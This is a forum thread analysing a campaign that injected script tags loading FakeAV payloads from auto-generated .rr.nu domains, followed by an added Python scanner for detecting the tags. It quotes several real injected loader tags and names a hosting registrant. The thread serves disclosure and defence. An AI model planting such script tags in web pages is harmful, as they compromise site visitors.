Malware Campaign from .rr.nu

Prorootect

Level 69
Thread author
Verified
Nov 5, 2011
5,855
.
Malware Campaign from .rr.nu topic only here ..

Malware Campaign from .rr.nu : on blog.sucuri.net : http://blog.sucuri.net/2012/02/malware-campaign-from-rr-nu.html

'We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD.'

I too ..

Dyslexic Mayans Want to Sell You Cialis
Problems with preg_replace("/.*/e","\x65\x76 , $_8b7b="\x63\x72\, eval(base64_ hacks, and those damn rr.nu domain redirects : on domesticenthusiast.blogspot.fr : http://domesticenthusiast.blogspot.fr/
.

Prorootect
So look at this example:

<!-- Share This END -->
<script src="http://garin90diana.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D

.. or after refresh of this hacked page:


<!-- Share This END -->
<script src="http://pfo42rest.rr.nu/pmg.php?d=x"></script>
</body>
</html>

:D:D

.. or:

<script src="http://cua09tedp.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://nings61diagno.rr.nu/pmg.php?d=x"></script>

.. or:

<script src="http://red38fir.rr.nu/pmg.php?d=x"></script>

etc. etc., then you have the payload: Antivirus 2012 or other FakeAV from Russia with Love :D

Prorootect
On-Going Dynamic FakeAV Campaign (yes, from Russia with Love!..) : on Zscaler blog: http://research.zscaler.com/2012/03/on-going-dynamic-fakeav-campaign.html

'The campaign is making use of auto-domain generation and auto-updating of infected sites to change the embedded link with every visit.' ..

'There were over 100 of our customers attempting to access a large number of websites on a handful of IPs with domains matching the pattern:
[3-6 random letters][2 digits][3-6 random letters].rr.nu
Given the very, very large number of domains used, this has to be some auto-domain generation/registration algorithm used in this campaign.

The pages accessed in the campaign include:
/n.php?h=1&s=mm
/mm.php?d=x1
/nl.php?p=d

..

195.88.181.112 hosting information:

inetnum: 195.88.181.0 - 195.88.181.255
netname: INET4YOU
descr: PE Bogaturev Sergey Anatolievich
country: RU

person: Bogaturev Sergey
address: RU, Gornuy #####, Komsomolskiy str. '

Aaa, Mr. Sergey, Gornuy ##### .. RU, Gornuy #####, Komsomolskiy str - it's good to know! Visit your police post immediately, and tell all. :(
.
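A defender-side check for the injection described in this thread: the `<script src="http://….rr.nu/pmg.php?d=x">` tags appended just before `</body>` in the second post, and the `[3-6 random letters][2 digits][3-6 random letters].rr.nu` naming scheme quoted from Zscaler in the third. This is an added example, not code from the thread, from Sucuri or from Zscaler; the sample HTML is constructed, and the path list and function names are my own assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domain shape quoted from the Zscaler write-up:
#   [3-6 random letters][2 digits][3-6 random letters].rr.nu
RR_NU_PATTERN = re.compile(r"^[a-z]{3,6}[0-9]{2}[a-z]{3,6}\.rr\.nu$", re.IGNORECASE)

# Loader paths seen in the thread: pmg.php from the injected tags,
# the other three from the quoted Zscaler post. (Assumed list; extend as needed.)
SUSPECT_PATHS = ("/pmg.php", "/n.php", "/mm.php", "/nl.php")


class ScriptSrcCollector(HTMLParser):
    """Collect every src= attribute of <script> tags in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value.strip())


def script_srcs(html):
    """Return the script src values found in the HTML, in document order."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return parser.srcs


def hostname_matches_campaign(host):
    """True if a hostname fits the quoted [letters][2 digits][letters].rr.nu shape."""
    return RR_NU_PATTERN.match(host) is not None


def classify_src(src):
    """Return (host, reason) for a script src pointing at an rr.nu host, else None."""
    # Protocol-relative ("//host/x") and absolute URLs both get a scheme for urlparse;
    # page-relative paths end up with a bogus hostname that never ends in .rr.nu.
    url = src if "://" in src else "http://" + src.lstrip("/")
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    if not host.endswith(".rr.nu"):
        return None
    reasons = []
    if hostname_matches_campaign(host):
        reasons.append("hostname matches [letters][2 digits][letters].rr.nu")
    if parts.path in SUSPECT_PATHS:
        reasons.append("known loader path " + parts.path)
    return host, "; ".join(reasons) or "rr.nu host"


def scan_page(html):
    """Return [(src, host, reason), ...] for every suspect script tag in the page."""
    hits = []
    for src in script_srcs(html):
        verdict = classify_src(src)
        if verdict is not None:
            hits.append((src,) + verdict)
    return hits


# Constructed sample: one normal script include, then the injection shape
# shown in the thread (tag appended right before </body>).
SAMPLE_HTML = """<html><head>
<script src="/js/jquery.min.js"></script>
</head><body>
<p>Hello</p>
<!-- Share This END -->
<script src="http://garin90diana.rr.nu/pmg.php?d=x"></script>
</body>
</html>"""

if __name__ == "__main__":
    for src, host, reason in scan_page(SAMPLE_HTML):
        print("SUSPECT: %s  (%s: %s)" % (src, host, reason))
```

Run it over the saved HTML of a site you administer to find the appended tag; `hostname_matches_campaign` on its own is also usable over hostnames pulled from proxy or DNS logs, which is how the quoted Zscaler post spotted the domain pattern. Because the injected hostname changes on every visit, matching the shape rather than a fixed domain is what makes the check useful.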